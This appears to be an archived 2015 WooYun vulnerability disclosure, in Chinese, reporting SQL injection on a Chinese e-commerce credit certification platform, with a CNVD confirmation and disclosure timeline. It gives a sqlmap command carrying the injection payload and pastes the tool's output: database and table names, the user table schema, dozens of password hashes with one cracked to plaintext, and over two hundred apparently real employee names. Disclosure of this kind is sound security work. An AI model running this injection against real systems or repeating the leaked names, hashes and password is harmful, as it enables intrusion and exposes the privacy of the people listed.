乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-06: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
中国电子商务信用认证平台SQL注射/大量信息泄露
射点sqlmap.py -u "https://**.**.**.**//entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d6%20AND%20204%3d204" --dbs
影响19个库
available databases [19]:[*] accesslog[*] company[*] cxt[*] cxt_cert[*] dede53[*] information_schema[*] joyinweb[*] mysql[*] performance_schema[*] phpcms[*] phpmyvisites[*] piwik[*] rdfocus[*] szfw2[*] szfw2_call[*] test[*] textpattern[*] tikiwiki[*] typechoDatabase: szfw2[140 tables]+---------------------------------------+| agent_map || am_agent || am_agent_contact || am_agent_in_out_sea_his || am_agent_log || am_agent_move || am_agent_pact || am_agent_permit || am_agent_share || am_agent_share_checklog || am_agent_source || am_agentcheck_log || am_agentpact_checklog || am_expect_charge || am_expect_charge_history || am_last_contact || am_pact_cashdeposit || am_pact_translog || am_quarterly_task || am_visit_acc_check || am_visit_acc_return || am_visit_accompany || am_visit_appoint || am_visit_note || am_visit_return || am_visit_vertify || am_visit_vertify_item || cert_company || cert_domain || cert_license || cm_ag_contact || cm_ag_contact_recode || cm_customer || cm_customer_agent || cm_customer_ex || cm_customer_log || cm_customer_move || cm_customer_permit || cm_data_config || cm_intention || cm_user_move || com_audit_record || com_bill_no || drp_wm_customer || fm_account_detail_rp || fm_account_recharge || fm_agent_account || fm_agent_account_amount || fm_agent_account_detail || fm_agent_bank || fm_attachments || fm_bank_account || fm_invoice_bill || fm_invoice_isseu || fm_invoice_isseu_bill || fm_invoice_no || fm_invoice_type || fm_post_money || fm_receipt_payment_mode || fm_receivable_pay || fm_receivable_pay_state || fm_unit_out_money || hr_abpost || hr_department || hr_dept_position || hr_e_position || hr_employee || hr_employee_old || hr_level || hr_position || hr_postion_level || log_login || log_operate || log_webservice || om_order || om_order_gift || om_order_gift_set || om_order_move_log || om_order_no || om_order_recharge || om_order_website || rpt_agent_contact_record || rpt_agent_intention_rating || rpt_kpi_base || sys_account_group || sys_account_group_user || sys_agent_model || sys_agent_model_detail || sys_agroup_manager || sys_agroup_manager_detail || sys_area || sys_area_group || sys_area_group_detail || sys_base_data || sys_city || sys_com_setting || sys_const_data || sys_data_synchronous || sys_dev_auto_code || sys_industry || sys_intention_rating || sys_message || sys_model || sys_model_group || sys_model_right || sys_post_right || sys_product || sys_product_price_model || sys_product_type || sys_province || sys_role || sys_role_right || sys_send_mail || sys_soap_log || sys_unit || sys_unit_salereward_rate_model || sys_unit_salereward_rate_model_detail || sys_upload_doc || sys_user || sys_user_area || sys_user_old || sys_user_right || sys_user_role || sys_vacation_days || sys_zone || temp_111 || temp_cert_company || tm_eMail || tm_net || tm_net_account || tm_net_model_manage_user || tm_net_model_manage_user_history || tm_net_verify || tm_single_info || tm_trustworthy || v_am_agent_pact_product || v_am_effect_pact_product || v_channel_manager_area || v_hr_abpost || v_hr_employee |+---------------------------------------+Database: szfw2Table: sys_user[23 columns]+-----------------+---------------------+| Column | Type |+-----------------+---------------------+| agent_id | int(5) unsigned || create_time | timestamp || create_uid | int(11) unsigned || dept_name | varchar(16) || e_name | varchar(8) || e_uid | int(8) unsigned || finance_no | varchar(64) || finance_uid | int(11) unsigned || is_del | tinyint(3) unsigned || is_finance | tinyint(4) || is_lock | int(3) unsigned || last_login_time | datetime || login_count | int(11) unsigned || phone | varchar(20) || sort_index | int(11) || tel | varchar(20) || update_time | timestamp || update_uid | int(11) unsigned || user_id | int(11) unsigned || user_name | varchar(16) || user_no | varchar(48) || user_pwd | varchar(64) || user_remark | varchar(256) |+-----------------+---------------------+Database: szfw2Table: sys_user[58 entries]+----------------------------------+| user_pwd |+----------------------------------+| 0009A9BD7AC397B4A311EAD4280E5C74 |明文:zhouhua| 001772FBA101EB45699B34F03F57694C || 0022671AC060C0E6682B2F91B8332BB9 || 00284A6D3ED73DC8D226D53467C1248E || 00291AEFD7117592F0858EC119136E60 || 00370D5A171DEB215D9C8B1FB51BC130 || 004B9B7AC4FC8B9E0412CCA0C9305C46 || 004D0A8147789FBDED427352260365C3 || 004D8391474EE20E05976A7BFFF1BAFE || 004DD1C9C616039C351C94AA7603B8CA || 0058AEA7FC8247B394E1C19FCAF05A36 || 005B6C065A2D4E4E15F5E8D195553336 || 0060CF811B2F26E664DF11352836D521 || 0062D21C1A97ACAD0FFF653DF56849B2 || 0067E0C6A7736FF2FEB5401C50E40055 || 0073F7639030624D23BAA08FA246A49C || 0078F94B32371DF125EF18CB4686E01D || 008B3B2FCDDBA8455DAD8B3A1B3079B4 || 008DBC66A01002D68888DE7B69438955 || 009AA9774B5CF730A880956FE6CAAB23 || 009B927906B97D1507451F45D795D55E || 009B927906B97D1507451F45D795D55E || 00A0C18D686BF8C2A0378DA16CCF7B97 || 00AA1DFAEB695A7AFA25F4E91EF5F3E7 || 00ACA552FD08D98306DB09566C88CF85 || 00B66944EEB6E8342A7085AB0B98AB96 || 00B89B8EB20AB3009960B8C05F2363AE || 00BCB1F530E3FE3F0C46DB712C09312D || 00C222E0437A1EFF39FF1B0C27D51953 || 00C5745BDF12D4C9C8714D53D5EB4053 || 00CF27E392AC1DA17A2A44B2B89AD8B3 || 00D38EF89D410F5FEBFB23DDE1D4E6F3 || 00DCBE5FADCC2A232E2F68DEDC42ABFB || 00DD223C028CEE28C5EF7F82004F4C0F || 00E155244F2829C4D08FE62CDC039B50 || 00E3170230703BE5AC1CEBC30291723A || 00E69BA9AC98F67595DA7AA6C02244D6 || 00EDE0A6C4D967AB8EE0E46C8809CC0E || 00F398C18CEA1911F58696E43CF85A47 || 00F39DCDE9CF1E731344520AB9D2DBA7 || 00F65D2EA75BEC0A987CFF849342BF82 || 00FEF253C6E3BDE1D3F16C6882760392 || 00FF50D1FEDEE1BCDDAFCD96ABC28489 || 010394E55922E7D5CF3B2A5585B06AFB || 0108CF8B0D9F6FBE9F63BD44766EA313 || 010A11C2A6691F8BE77F6519295D20DB || 011FE5DB205CD7CF21144AE329A949D3 || 01224DAF6A9E29FCEFF81668F4AC589E || 0123CADA84714B1273415029FC778C3B || 012A0DF605EDC90B7BFB75FFB55F6103 || 0138C595E85D5BA9951D9993517FEAB3 || 013C9F7DE65AD0C26922D864742F3A7C || 01438E10ABB1EA0E7B5514A2E61C2191 || 0143B99B04C05979106439B4D4397E8D || 01465D7F7019EC7D654997001678AD2A || 0146F74685E3EF63992126EB50A44A7D || 014D389D1CC652B37FEFA3CADD6D19EF || 0156C4B099E489BA4D13DB6BD3EBB2AE |+----------------------------------+Database: szfw2Table: sys_user[267 entries]+----------+| e_name |+----------+[13:36:59] [WARNING] console output will be trie table size| pshz0060 || test || test || test || test1 || test4 || 丁丽珍 || 丁于 || 丁亚丹 || 丁佳伟 || 丁兵群 || 丁剑波 || 丁勇 || 丁勰 || 丁占英 || 丁卫星 || 丁垚量 || 丁士杰 || 丁季多 || 丁宁 || 丁宏儒 || 丁小兵 || 丁小波 || 丁少远 || 丁幸 || 丁建强 || 丁建潮 || 丁彩 || 丁怡 || 丁慧丽 || 丁敏兰 || 丁新蕾 || 丁旭兰 || 丁晓慧 || 丁晓飞 || 丁柳 || 丁柳 || 丁根良 || 丁梦岚 || 丁泽龙 || 丁海燕 || 丁涛 || 丁涛涛 || 丁潇潇 || 丁玉兰 || 丁玉珍 || 丁珊珊 || 丁碧霞 || 丁磊 || 丁莉萍 || 丁莹 || 丁菊 || 丁蓉蓉 || 丁蕊 || 丁超 || 丁超颖 || 丁达坤 || 丁鑫 || 丁钱杰 || 丁银萍 || 丁银银 || 丁锟 || 丁雨平 || 丁颖 || 丁颖 || 丁飞云 || 丁魁 || 丁鼎 || 万东辉 || 万东辉 || 万云 || 万亚琴 || 万佳玲 || 万光胜 || 万分标 || 万勇 || 万嘉东 || 万娟 || 万婷婷 || 万平 || 万志强 || 万忠坤 || 万振国 || 万敏 || 万文婷 || 万明佳 || 万明辉 || 万昱 || 万晓寅 || 万源 || 万玉婷 || 万琴 || 万真 || 万秀东 || 万科 || 万英宏 || 万蓉 || 万辉 || 万通 || 三部管理 || 上官建行 || 上官艳艳 || 丛珊 || 东智勇 || 严一飞 || 严东红 || 严丽萍 || 严云良 || 严伟 || 严伟惠 || 严佳梦 || 严加武 || 严勇 || 严厚辉 || 严叶超 || 严国梅 || 严国梅 || 严坷娣 || 严娟娟 || 严婕 || 严嵩 || 严廷豪 || 严德胜 || 严志强 || 严振 || 严攀越 || 严文龙 || 严新 || 严晓斌 || 严杭鑫 || 严林树 || 严林盛 || 严梦姣 || 严江成 || 严浩 || 严浩浩 || 严渭飞 || 严玉和 || 严琰 || 严瑶琴 || 严皓 || 严科立 || 严绍平 || 严聪 || 严艳儿 || 严莉萍 || 严跃明 || 严鄂平 || 严陈静 || 中网互赢 || 丰亚雅 || 丰娟 || 丰瑜晴 || 丰财 || 义乌打印 || 乐丽霞 || 乐容容 || 乐朝阳 || 乐淘 || 乐玲娜 || 乐秋露 || 乐超超 || 乔南 || 乔姗姗 || 乔明明 || 乔朋 || 乔蒙蒙 || 乔通卫 || 于军海 || 于军海 || 于利平 || 于博 || 于婷 || 于建军 || 于彩虹 || 于彬彬 || 于振伟 || 于敏茜 || 于明坤 || 于春福 || 于春福 || 于春艳 || 于梦佳 || 于欢欢 || 于泉 || 于洋 || 于琦 || 于琼伟 || 于疆 || 于继纲 || 于若木 || 于萍 || 于金霞 || 于雪 || 于静 || 云占锋 || 云建新 || 亓鑫 || 井厚飞 || 井睆珊 || 井茹 || 亢永灿 || 仇义娜 || 仇志华 || 付世龙 || 付云云 || 付佳倩 || 付倩 || 付勇 || 付勇1 || 付博 || 付姗姗 || 付媛媛 || 付小红 || 付庆洋 || 付徐涛 || 付志文 || 付恩颂 || 付文强 || 付文文 || 付斌斌 || 付晓丽 || 付晓廉 || 付梅 || 付清科 || 付爱春 || 付玲慧 || 付珊珊 || 付祎 || 付胤 || 付芳 || 付闪宾 || 仝丹丹 || 仝琳 || 代凤海 || 代剑锋 || 代婷婷 || 代子慧 || 代富如 || 代晓军 || 代晴晴 || 代森 || 代淑姣 || 代玉 || 代瑶 || 代立龙 || 代艳丽 || 代路伟 || 代路英 || 代金苹 || 代金苹 || 代长均 || 代长均 || 仰敏 || 仲夏斌 || 仵州 |+----------+
很多我都没跑完,因为sqlmap装不下了。。。。。几张过程图贴一下
有几个电话号码
一坨密码。。。看着都头晕
综上
你们懂
危害等级:中
漏洞Rank:10
确认时间:2015-10-12 10:54
CNVD确认并复现所述情况,已由CNVD通过网站公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无